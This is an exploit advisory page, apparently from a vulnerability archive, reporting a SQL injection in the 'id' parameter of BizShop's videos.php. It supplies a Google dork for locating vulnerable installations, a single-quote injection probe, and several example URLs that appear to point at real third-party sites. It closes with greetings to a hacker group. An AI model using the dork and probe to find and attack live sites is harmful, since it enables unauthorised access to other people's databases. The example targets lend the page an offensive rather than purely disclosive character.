BizShop SQL Injection

2012.06.27
Credit: Dark-Puzzle
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:videos.php?id intext:\"Powered by BizShop Webmaster Service\"

# Exploit Title: BizShop - SQL Injection Vulnerability # Author: Dark-Puzzle # Category : Webapps # Vendor Homepage: http://bizshop.com/ # Google Dork: inurl:videos.php?id intext:"Powered by BizShop Webmaster Service" # Date: 24 June 2012 # Vendor : BizShop Webmaster Service . # Version: All Versions # Tested on: Windows Xp Sp2 , Backtrack 5 . ----------------------------------------------------------- Vulnerability : http://example.com/videos.php?id=darkpuzzle' Examples : http://healthbizsxop.com/videos.php?id=Cheerleading' http://server1.bizxhop.com/videos.php?id=Instrumental Solo' http://www.healxdmoney4u.com/videos.php?id=Church+Choir' ----------------------------------------------------------- Follow me : https://www.facebook.com/dark.puzzle Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army Greetz to : M.C.A , Team-Hunter , Dr.napst3r , Jigs@w ...

References:

http://bizshop.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top